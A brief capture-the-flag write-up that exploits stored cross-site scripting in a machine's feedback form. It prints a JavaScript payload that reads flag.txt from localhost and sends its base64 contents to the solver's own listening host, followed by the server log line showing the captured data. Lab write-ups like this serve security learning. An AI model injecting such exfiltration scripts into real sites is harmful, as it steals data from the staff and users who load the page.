There is only one form that takes user input, it also says: Thanks for your feedback! It will be evaluated shortly by our staff at the bottom, which is a big hint that there is some interaction with the data that is sent through the form.
In the description of the machine we get a hint as to where the flag.txt should be.
With some testing we see that the form executes any Javascript we provide, this way we can get the flag through the feedback form.
html
<script>
fetch('http://127.0.0.1:8080/flag.txt')
.then(r => r.text())
.then(text => fetch('http://10.9.2.78/?' + btoa(text)))
</script>The response:
plaintext
10.10.151.94 - - [16/Dec/2024 12:04:30] "GET /?VEhNezgzNzg5YTY5MDc0ZjYzNmY2NGEzODg3OWNmY2FiZThiNjIzMDVlZTZ9 HTTP/1.1" 200 -